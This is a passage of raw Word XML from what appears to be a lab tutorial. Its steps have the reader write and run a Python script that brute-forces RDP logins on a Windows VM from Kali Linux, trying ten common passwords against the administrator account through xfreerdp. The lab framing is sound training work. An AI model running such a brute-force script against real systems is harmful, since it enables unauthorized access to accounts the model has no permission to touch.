          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> STEP 6: Create Python Brute-Force Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6CDD42" w14:textId="77777777" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00415E11">
      <w:pPr>
        <w:ind w:left="720"/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6.1 Open Terminal → Create Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A70EC10" w14:textId="77777777" w:rsidR="00520BB4" w:rsidRPr="00377D4E" w:rsidRDefault="00520BB4" w:rsidP="00415E11">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00377D4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nano rdp_brute.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091D1FC5" w14:textId="77777777" w:rsidR="00520BB4" w:rsidRPr="00377D4E" w:rsidRDefault="00520BB4" w:rsidP="00415E11">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00377D4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.2 Paste the Script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D588901" w14:textId="77777777" w:rsidR="00520BB4" w:rsidRPr="00520BB4" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1614305C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>import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDA89E9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proofErr w:type="spell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target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spell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= "192.168.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56.102"   #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Replace with your Windows VM IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E99938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>username = "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administrator"     #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Replace with your Windows username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A7D08F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7F8E846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># Small wordlist of 10 passwords (customize as needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F3959A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>passwords = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BF1C6D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"123456",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB22F27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"admin",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C7D5CA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"administrator",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F34D50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"password",    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A61926D" w14:textId="143734DA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"admin123",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3B5CF5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"test123",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C69D222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"welcome",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AF45DB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"qwerty",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7917C4C9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"1234",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE5583F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"56789"   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C771ADD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>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404E700B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C2D3515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>print(f"[*] Starting brute-force on {</w:t>
      </w:r>
      <w:proofErr w:type="spell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target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spell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} with 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username '{username}'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...\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5A2D5D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8B0E3E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for attempt, password in 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enumerate(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passwords, 1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAE48FA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print(f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"[{attempt}/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10] Trying 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password: {password}"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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15325A3E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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BCB193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result = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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subprocess.run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F73837">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2CF51EF5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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            ["</w:t>
      </w:r>
      <w:proofErr w:type="spell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xfreerdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F73837">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>", f"/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v:{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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target_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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F73837">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>}"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, f"/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u:{username}"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, f"/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p:{password}"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, "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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cert:ignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B16C94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    </w:t>
      </w:r>
      <w:proofErr w:type="spell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capture_output</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F73837">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9F3FDB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    text=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2761A973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    timeout=10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AE620A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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F3FB7E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F03CCCB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if "Authentication only, exit status 0" in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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result.stderr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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result.returncode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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== 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD44E2D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    print(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f"\n[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+] SUCCESS! Password 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found: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{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password}"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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC80AA9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    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break</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1B4DC80B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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12000EE3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    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print(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"[-] Failed.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2747D97B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6F144F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except </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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subprocess.TimeoutExpired</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626ADF42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print(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"[!] Timeout, skipping...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3903C889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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6130F646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    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print(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f"[!] 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Error: {e}"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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E64D8B6" w14:textId="77777777" w:rsidR="00377D4E" w:rsidRPr="00F73837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>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23786785" w14:textId="5E5D1CF6" w:rsidR="00377D4E" w:rsidRDefault="00377D4E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73837">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F73837">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>n[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F73837">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>-] Tried all 10 passwords. No match found.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24400973" w14:textId="77777777" w:rsidR="00F73837" w:rsidRPr="00F73837" w:rsidRDefault="00F73837" w:rsidP="00377D4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2D280D3" w14:textId="77777777" w:rsidR="00520BB4" w:rsidRPr="00377D4E" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00377D4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.3 Save and Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A506A8" w14:textId="77777777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• Press Ctrl + O, then Enter to save.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FD1300" w14:textId="77777777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• Press Ctrl + X to exit nano.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CEDB24" w14:textId="750F41DB" w:rsidR="00520BB4" w:rsidRPr="00D917EC" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917EC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> STEP 7: Run the Brute-Force Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B9BC8A" w14:textId="09AD748E" w:rsidR="00520BB4" w:rsidRPr="00520BB4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 xml:space="preserve">Run the script </w:t>
      </w:r>
      <w:r w:rsidR="00D917EC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">in kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D917EC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D917EC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364A0D6" w14:textId="2A82A00C" w:rsidR="00773518" w:rsidRDefault="00520BB4" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00520BB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>python3 rdp_brute.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76638F00" w14:textId="77777777" w:rsidR="00415E11" w:rsidRDefault="00415E11" w:rsidP="00520BB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FBD43F7" w14:textId="6F4E7026" w:rsidR="00415E11" w:rsidRPr="00520BB4" w:rsidRDefault="00415E11" w:rsidP="00520BB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E437CF" wp14:editId="25FC63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50920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="101260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020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E11" w:rsidRPr="0052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B4"/>
    <w:rsid w:val="000E6AD4"/>
    <w:rsid w:val="00377D4E"/>
    <w:rsid w:val="00411134"/>
    <w:rsid w:val="00415E11"/>
    <w:rsid w:val="0043462E"/>
    <w:rsid w:val="00520BB4"/>
    <w:rsid w:val="00773518"/>
    <w:rsid w:val="00D917EC"/>
    <w:rsid w:val="00DC382D"/>
    <w:rsid w:val="00F73837"/>
    <w:rsid w:val="00FC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B5C5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6A935C48-6BB0-46D6-B829-06AEED95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B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Asaduzzaman chowdhury</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Asaduzzaman chowdhury</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-19T07:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-19T08:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>